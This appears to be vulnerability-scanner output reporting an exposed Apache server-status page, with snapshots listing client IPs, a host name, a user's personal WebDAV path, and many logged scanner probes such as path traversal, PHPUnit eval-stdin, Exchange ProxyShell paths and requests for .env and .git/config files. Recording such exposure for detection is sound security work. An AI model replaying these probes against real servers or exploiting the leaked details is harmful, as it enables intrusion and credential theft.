0.00737061611248310.00.006.73 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-25-0/0/514. 0.00737061956410.00.002.95 167.94.138.46http/1.1localhost:80GET / HTTP/1.1 0-25-0/0/512. 0.0073706264967560.00.003.46 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/497. 0.00737061831144210.00.002.99 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-25-0/0/464. 0.0073706181001490.00.003.60 109.206.241.102http/1.1localhost:80POST / HTTP/1.1 0-25-0/0/512. 0.00737061571113280.00.004.60 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-25-0/0/550. 0.00737061861046550.00.005.45 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-25-0/0/530. 0.007370621000540.00.0011.96 167.248.133.188h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-25-0/0/549. 0.00737061311143050.00.006.39 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-25-0/0/522. 0.00737062371087650.00.009.53 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-25-0/0/564. 0.00737061881303780.00.0012.63 167.94.138.46http/1.1 1-25-0/0/534. 0.007370611137590.00.003.85 167.94.138.46http/1.1localhost:80GET / HTTP/1.1 1-25-0/0/524. 0.00737061741541480.00.0018.14 143.42.109.185http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-25-0/0/518. 0.00737061711106410.00.003.63 179.43.191.18http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-25-0/0/520. 0.00737061401080440.00.003.97 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-25-0/0/538. 0.007370601131450.00.004.40 185.225.74.55http/1.1localhost:80POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/. 1-25-0/0/515. 0.0073706157979530.00.005.72 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-25-0/0/551. 0.00737061901126750.00.004.36 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 1-25-0/0/512. 0.007370621078030.00.003.26 43.128.232.139http/1.1localhost:80GET / HTTP/1.1 1-25-0/0/580. 0.00737062881414350.00.007.06 152.89.196.211http/1.1ravignon.mycloud.paris:443GET /console/ HTTP/1.1 1-25-0/0/520. 0.00737061501418210.00.004.43 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-25-0/0/540. 0.00737061381191510.00.003.85 162.243.136.12http/1.1 1-25-0/0/543. 0.007370610051129520.00.004.01 43.128.232.139http/1.1 1-25-0/0/544. 0.0073706821322760.00.003.28 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-25-0/0/542. 0.00737061541094280.00.006.60 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-25-0/0/551. 0.00737062121132870.00.004.12 91.193.7.84http/1.1 1-25-0/0/529. 0.00737061191038400.00.0012.48 134.122.135.178http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-25-0/0/532. 0.00737061561166660.00.004.02 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbfda73995
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-01-23T18:34:42 Current Time: Saturday, 18-Feb-2023 13:24:25 UTC Restart Time: Friday, 10-Feb-2023 17:57:46 UTC Parent Server Config. Generation: 9 Parent Server MPM Generation: 8 Server uptime: 7 days 19 hours 26 minutes 38 seconds Server load: 0.00 0.00 0.00 Total accesses: 11096 - Total Traffic: 77.5 MB - Total Duration: 2361104 CPU Usage: u21.45 s40.91 cu73.6 cs20.89 - .0232% CPU load .0164 requests/sec - 120 B/second - 7.2 kB/request - 212.789 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0110742no0yes718000 1110743no0yes520000 Sum200 1238000 WW_____W___W___W__WW______W______W___R_R______W___.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-81107421/11/240W 0.8200536180.00.041.40 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /info.php HTTP/1.1 0-81107421/10/235W 0.9600560660.00.051.38 67.205.130.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-81107420/8/251_ 0.6875730537240.00.041.47 3.80.237.144http/1.1 0-81107420/3/252_ 0.8200936220.00.001.49 67.205.130.223http/1.1 0-81107420/6/238_ 1.0062083448410.00.051.39 117.205.106.188http/1.1localhost:80GET / HTTP/1.1 0-81107420/10/250_ 1.0130490583400.00.041.39 220.180.37.203http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-81107420/10/251_ 1.0057682533020.00.051.87 194.87.151.204http/1.1localhost:80GET / HTTP/1.1 0-81107421/8/248W 0.9600500580.00.061.57 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-81107420/7/252_ 0.6944970528870.00.091.67 198.199.97.219http/1.1 0-81107420/6/236_ 0.8262060360980.00.041.43 117.205.106.188http/1.1 0-81107420/8/253_ 0.9619628980.00.071.53 67.205.130.223http/1.1 0-81107421/8/247W 0.8200580210.00.021.99 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 0-81107420/7/277_ 1.032011649430.00.031.95 134.35.3.233http/1.1localhost:80GET / HTTP/1.1 0-81107420/7/252_ 0.8257680580060.00.011.49 194.233.160.248http/1.1 0-81107420/9/243_ 0.9517634210.00.091.55 67.205.130.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-81107421/4/224W 0.8200432540.00.051.39 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-81107420/6/237_ 0.666310454040.00.021.40 109.237.98.226http/1.1 0-81107420/3/242_ 0.692011531850.00.011.47 134.35.3.233http/1.1 0-81107421/11/259W 0.8000541380.00.071.65 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-81107421/3/246W 0.6800464690.00.031.48 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-81107420/10/263_ 1.026310415600.00.021.55 109.237.98.226http/1.1localhost:80GET /.env HTTP/1.1 0-81107420/5/251_ 0.6810392330.00.031.76 67.205.130.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-81107420/8/236_ 0.8011911538850.00.011.44 172.104.11.46http/1.1 0-81107420/7/244_ 0.8215760635650.00.032.32 61.0.55.40http/1.1 0-81107420/9/242_ 1.0115771507220.00.071.52 61.0.55.40http/1.1localhost:80GET / HTTP/1.1 1-81107430/5/207_ 0.7560901359460.00.001.23 192.241.231.12http/1.1localhost:80MGLNDD_109.190.179.92_80\n 1-81107431/2/196W 0.4600388500.00.004.91 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-81107430/5/208_ 0.4875730407290.00.021.19 3.80.237.144http/1.1 1-81107430/6/188_ 0.6500302340.00.041.14 67.205.130.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-81107430/8/203_ 0.641244545830.00.031.14 67.205.130.223http/1.1 1-81107430/10/201_ 0.6500469690.00.091.28 67.205.130.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-81107430/2/192_ 0.4810565430.00.001.09 172.105.246.139http/1.1 1-81107430/6/191_ 0.4710398810.00.001.60 67.205.130.223http/1.1 1-81107431/4/179W 0.4700335940.00.041.05 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-81107430/7/203_ 0.772196459550.00.041.26 67.205.130.223http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-81107430/4/195_ 0.4710293850.00.041.18 67.205.130.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-81107430/5/215_ 0.756310419650.00.021.39 109.237.98.226http/1.1localhost:80\x16\x03\x01\x01H\x01 1-81107430/5/169R 0.47121940370580.00.050.94 67.205.130.223http/1.1 1-81107430/4/214_ 0.4679020471690.00.031.36 103.27.77.124http/1.1 1-81107430/6/183R 0.73110851415590.00.031.47 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-81107430/4/195_ 0.66110802413630.00.031.10 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-81107430/5/185_ 0.48110800298160.00.051.17 172.105.246.139http/1.1 1-81107430/6/189_ 0.6675730502060.00.031.21 3.80.237.144http/1.1 1-81107430/4/218_ 0.4760890435270.00.004.29 172.105.246.139http/1.1 1-81107430/3/197_ 0.47188800513760.00.031.20 172.105.246.139http/1.1 1-81107430/6/216_ 0.486310331630.00.021.27 172.105.246.139http/1.1 1-81107431/5/186W 0.4700401210.00.051.71 67.205.130.223http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-81107430/6/210_ 0.681141351300.00.061.27 198.199.93.54http/1.1ravignon.mycloud.paris:443GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1 1-81107430/8/201_ 0.7379026387960.00.071.21 103.27.77.124http/1.1localhost:80HEAD / HTTP/1.1 1-81107430/5/186_ 0.6500259010.00.041.32 67.205.130.223http/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb30954f8a
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-01-23T18:34:42 Current Time: Saturday, 11-Feb-2023 03:44:25 UTC Restart Time: Friday, 10-Feb-2023 17:57:46 UTC Parent Server Config. Generation: 2 Parent Server MPM Generation: 1 Server uptime: 9 hours 46 minutes 38 seconds Server load: 0.00 0.00 0.00 Total accesses: 71 - Total Traffic: 596 kB - Total Duration: 11087 CPU Usage: u1.34 s2.15 cu.34 cs.11 - .0112% CPU load .00202 requests/sec - 17 B/second - 8.4 kB/request - 156.155 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 06533no0yes025000 16534no0yes1213000 Sum200 1238000 _________________________RR_WR_R___R_R__R_RWR__W__.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-165330/1/2_ 0.04361000.00.000.00 222.117.186.228http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-165330/1/1_ 0.183641911910.00.020.02 78.187.210.59http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-165330/1/2_ 0.033544010.00.000.00 18.134.5.90http/1.1localhost:80GET /.git/HEAD HTTP/1.1 0-165330/1/1_ 0.16354485850.00.020.02 193.118.53.194http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-165330/1/2_ 0.03399401940.00.000.02 185.246.220.98http/1.1 0-165330/1/1_ 0.153994000.00.000.00 185.246.220.98http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-165330/1/1_ 0.034124000.00.000.00 192.241.225.17http/1.1localhost:80GET /portal/redlion HTTP/1.1 0-165330/2/3_ 0.154125892860.00.020.05 64.62.197.165http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 0-165330/1/2_ 0.024573931990.00.020.04 64.62.197.165http/1.1 0-165330/0/1_ 0.004574000.00.000.00 64.62.197.157h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-165330/1/1_ 0.014574550.00.000.00 64.62.197.162http/1.1 0-165330/1/2_ 0.14424476780.00.020.02 64.62.197.162http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-165330/0/1_ 0.004575000.00.000.00 64.62.197.158h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-165330/1/2_ 0.0902152170.00.020.02 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-165330/1/2_ 0.0702382380.00.020.02 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-165330/0/1_ 0.000000.00.000.00 134.122.110.201h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-165330/0/1_ 0.004576000.00.000.00 64.62.197.155h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-165340/0/2R 0.00134360130.00.000.01 162.142.125.10http/1.1localhost:80GET / HTTP/1.1 1-165340/1/2R 0.011344121350.00.000.03 23.251.102.74http/1.1localhost:80GET / HTTP/1.1 1-165340/1/2_ 0.0542512092090.00.020.02 64.62.197.157http/1.1ravignon.mycloud.paris:443GET /dns-query?name=dnsscan.shadowserver.org&type=A HTTP/1.1 1-165341/0/2W 0.00003940.00.000.02 134.122.110.201http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-165340/0/1R 0.0012780000.00.000.00 20.163.181.40http/1.1localhost:80\x16\x03\x01 1-165340/1/3_ 0.025333175920.00.010.03 104.149.128.25http/1.1localhost:80GET / HTTP/1.1 1-165340/0/1R 0.0013463000.00.000.00 221.153.107.219http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-165340/0/3_ 0.006810330.00.000.00 35.177.26.98http/1.1 1-165340/1/2_ 0.053225330.00.000.01 45.147.248.139http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-165340/0/2_ 0.00425102240.00.000.02 69.162.243.124http/1.1localhost:80GET /.env HTTP/1.1 1-165340/1/3R 0.0113043000.00.000.00 125.130.31.240http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-165340/1/4_ 0.0601913920.00.020.05 134.122.110.201http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-165340/0/1R 0.0013436000.00.000.00 159.203.192.10http/1.1 1-165340/0/2_ 0.004573010.00.000.00 64.62.197.166http/1.1 1-165340/0/2_ 0.00533258610.00.000.03 162.142.125.10h2cdone, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-165340/1/2R 0.0112780000.00.000.00 34.140.248.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-165340/0/2_ 0.00457401210.00.000.03 64.62.197.160http/1.1 1-165340/1/2R 0.0268132250.00.000.01 35.177.26.98http/1.1localhost:80GET /.git/HEAD HTTP/1.1 1-165341/0/1W 0.000000.00.000.00 134.122.110.201http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-165340/0/2R 0.00134631830.00.000.02 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 1-165340/0/3_ 0.0002313240.00.000.04 134.122.110.201http/1.1 1-165341/0/1W 0.000000.00.000.00 134.122.110.201http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request DurSum of milliseconds required to process all requests ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot SSL/TLS Session Cache Status: cache type: SHMCB, shared memory: 512000 bytes, current entries: 8subcaches: 32, indexes per subcache: 88time left on oldest entries' objects: avg: 299 seconds, (range: 298...299)index usage: 0%, cache usage: 0%total entries stored since starting: 18total entries replaced since starting: 0total entries expired since starting: 10total (pre-expiry) entries scrolled out of the cache: 0total retrieves since starting: 0 hit, 10 misstotal removes since starting: 0 hit, 1 miss Apache/2.4.52 (Ubuntu) Server at 109.190.179.92 Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbca4fe82f
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-01-23T18:34:42 Current Time: Monday, 06-Feb-2023 20:57:23 UTC Restart Time: Friday, 03-Feb-2023 06:47:10 UTC Parent Server Config. Generation: 4 Parent Server MPM Generation: 3 Server uptime: 3 days 14 hours 10 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 5387 - Total Traffic: 35.8 MB - Total Duration: 730729 CPU Usage: u26.33 s23.3 cu15.25 cs4.53 - .0224% CPU load .0174 requests/sec - 121 B/second - 6.8 kB/request - 135.647 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0160909no0yes124000 1160910no0yes1114000 Sum200 1238000 ________W_________________WWW__R____WW__W_WW__W_W_.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31609090/46/108_ 9.34534965149560.00.270.63 169.57.196.28http/1.1 0-31609090/45/102_ 9.40509272106340.00.290.56 45.227.254.19http/1.1localhost:80\x03 0-31609090/42/114_ 9.39549899126010.00.270.68 51.254.59.114http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-31609090/44/102_ 9.34547360175790.00.280.68 31.163.132.120http/1.1 0-31609090/42/109_ 9.3883875109730.00.240.60 221.121.143.161http/1.1ravignon.mycloud.paris:443GET /wp-login.php HTTP/1.1 0-31609090/34/98_ 9.181077680123640.00.200.57 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31609090/44/96_ 9.301077662143600.00.250.51 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31609090/41/108_ 9.36284565149200.00.821.24 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31609091/43/100W 9.3600155530.00.240.56 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-31609090/45/111_ 9.06549873143700.00.250.64 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31609090/44/103_ 9.131077560128760.00.270.59 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-31609090/42/114_ 9.12284565153060.00.230.62 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31609090/37/99_ 9.36060146210.00.230.54 139.59.159.130http/1.1 0-31609090/45/114_ 9.4028503163010.00.260.68 193.32.162.159http/1.1localhost:80GET / HTTP/1.1 0-31609090/41/108_ 9.28509293172830.03.173.59 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31609090/41/102_ 9.33838674113830.00.240.55 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31609090/44/104_ 9.4053490129270.00.270.65 169.57.196.28http/1.1localhost:80CONNECT www.google.com:443 HTTP/1.1 0-31609090/43/103_ 9.3799590141140.00.250.55 185.246.220.98http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-31609090/41/110_ 9.201026663159090.00.240.65 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31609090/42/106_ 9.361072166168080.00.270.68 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31609090/43/103_ 9.191071687148500.00.250.55 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31609090/43/119_ 9.311071662142040.00.260.71 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 0-31609090/44/120_ 9.3110775102164800.00.270.70 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-31609090/41/107_ 9.371026795120030.00.230.64 141.98.10.56http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-31609090/40/101_ 9.26995973171000.00.230.58 185.246.220.98http/1.1 1-31609100/59/102_ 12.63161142750.00.380.63 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-31609101/62/106W 12.7300130820.00.410.66 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-31609101/67/122W 12.7200172090.01.101.45 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-31609101/61/112W 12.6000161300.00.480.78 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-31609100/67/117_ 12.81630182320.00.440.74 102.90.34.46http/1.1localhost:80GET / HTTP/1.1 1-31609100/70/114_ 12.75095155610.00.420.66 139.59.159.130h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-31609100/62/98R 12.61292567105020.00.310.50 139.59.159.130http/1.1 1-31609100/64/113_ 12.69083155650.00.550.81 139.59.159.130h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-31609100/55/103_ 12.7600122180.00.340.59 139.59.159.130http/1.1 1-31609100/53/102_ 12.74059124300.00.290.52 139.59.159.130http/1.1 1-31609100/64/106_ 12.7923978145930.00.390.58 116.131.53.98http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-31609101/56/112W 12.7900145250.00.350.69 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /.git/config HTTP/1.1 1-31609101/51/92W 12.78015105620.00.300.53 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /info.php HTTP/1.1 1-31609100/61/106_ 12.7401187900.00.310.56 139.59.159.130http/1.1 1-31609100/59/112_ 12.260105161690.00.330.61 139.59.159.130h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-31609101/65/113W 12.7100115660.00.390.63 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /.DS_Store HTTP/1.1 1-31609100/80/125_ 12.7400151770.00.450.74 139.59.159.130h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-31609101/67/113W 12.7800151410.00.410.66 139.59.159.130http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-31609101/73/118W 12.7900162820.00.450.74 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 1-31609100/58/99_ 12.440169161070.00.330.53 139.59.159.130http/1.1 1-31609100/59/108_ 12.821308140290.00.360.63 139.59.159.130http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-31609101/53/102W 12.3600151720.00.300.63 139.59.159.130http/1.1ravignon.mycloud.paris:443GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-31609100/59/113_ 12.736362160210.00.330.72 102.90.34.46http/1.1 1-31609101/62/106W 12.7800165860.00.380.61
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb1da6578f
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2022-06-14T12:30:21 Current Time: Thursday, 24-Nov-2022 23:23:05 UTC Restart Time: Thursday, 27-Oct-2022 15:15:21 UTC Parent Server Config. Generation: 33 Parent Server MPM Generation: 32 Server uptime: 28 days 8 hours 7 minutes 43 seconds Server load: 0.01 0.02 0.00 Total accesses: 89456 - Total Traffic: 58.6 GB - Total Duration: 55754902 CPU Usage: u108.42 s161.31 cu3144.23 cs1403.27 - .197% CPU load .0365 requests/sec - 25.1 kB/second - 0.7 MB/request - 623.266 ms/request 12 requests currently being processed, 38 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0345786no0yes421000 1345787no0yes817000 Sum200 1238000 ___W_____W_____RR________W__W_WWWW_____________R_R.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-323457860/83/999_ 30.245707704650.026.96458.06 185.3.94.183http/1.1 0-323457860/85/980_ 30.27127702584530.026.66562.22 185.246.221.138http/1.1 0-323457860/78/1072_ 30.27722204352230.025.38458.25 128.14.209.146http/1.1 0-323457861/82/1000W 30.46006316730.019.47622.58 185.3.94.183http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-323457860/79/1002_ 30.27448302377680.018.32516.37 213.14.141.242http/1.1 0-323457860/85/1062_ 30.3052422802880.023.10472.17 185.3.94.183http/1.1 0-323457860/83/1007_ 30.27588612488780.020.20423.51 205.210.31.23http/1.1 0-323457860/81/987_ 30.4422182570300.018.19611.67 185.3.94.183h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-323457860/83/1006_ 30.5381353897590.026.11419.19 185.3.94.183http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-323457861/85/1000W 30.24002496160.026.03690.49 185.3.94.183http/1.1ravignon.mycloud.paris:443GET /info.php HTTP/1.1 0-323457860/85/1027_ 30.35500006595120.028.07635.87 192.241.212.86http/1.1 0-323457860/83/1015_ 30.26716502453280.014.83682.16 124.156.219.253http/1.1 0-323457860/77/1021_ 30.47716515090650.017.35424.95 62.233.50.179http/1.1localhost:80\x03 0-323457860/80/992_ 30.48448302398940.021.08477.69 213.14.141.242http/1.1localhost:80GET / HTTP/1.1 0-323457860/83/1088_ 30.13706195610.025.41494.87 185.3.94.183h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-323457860/81/1009R 30.46754402592760.016.84462.87 185.3.94.183http/1.1 0-323457860/92/1085R 30.2675422122993000.017.22454.55 185.3.94.183http/1.1 0-323457860/82/1021_ 30.27208702661010.024.50445.53 192.241.198.103http/1.1localhost:80GET /portal/redlion HTTP/1.1 0-323457860/82/1007_ 30.5020872402554400.016.57596.27 192.241.205.21http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-323457860/86/967_ 30.24112905370.027.38534.53 185.3.94.183http/1.1 0-323457860/83/1030_ 30.097163944562540.019.12463.24 62.233.50.179http/1.1 0-323457860/83/986_ 30.314972368620.018.10433.43 185.3.94.183http/1.1 0-323457860/84/992_ 30.51127804430590.034.90598.44 185.246.221.138http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-323457860/80/999_ 29.77603102550.018.35605.11 185.3.94.183h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-323457860/80/992_ 30.24302396120.018.19482.75 185.3.94.183h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-323457871/42/1268W 15.360010932900.07.711125.96 185.3.94.183http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-323457870/39/1230_ 15.371112204958460.014.65676.24 192.241.204.38http/1.1localhost:80GET /actuator/health HTTP/1.1 1-323457870/41/1235_ 15.301028703271140.014.12542.32 124.156.219.253h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-323457871/40/1257W 10.06003820660.09.74652.57 185.3.94.183http/1.1ravignon.mycloud.paris:443GET /telescope/requests HTTP/1.1 1-323457870/38/1223_ 15.16509301620.07.771588.02 185.3.94.183h2done, streams: 0/0/0/0/0 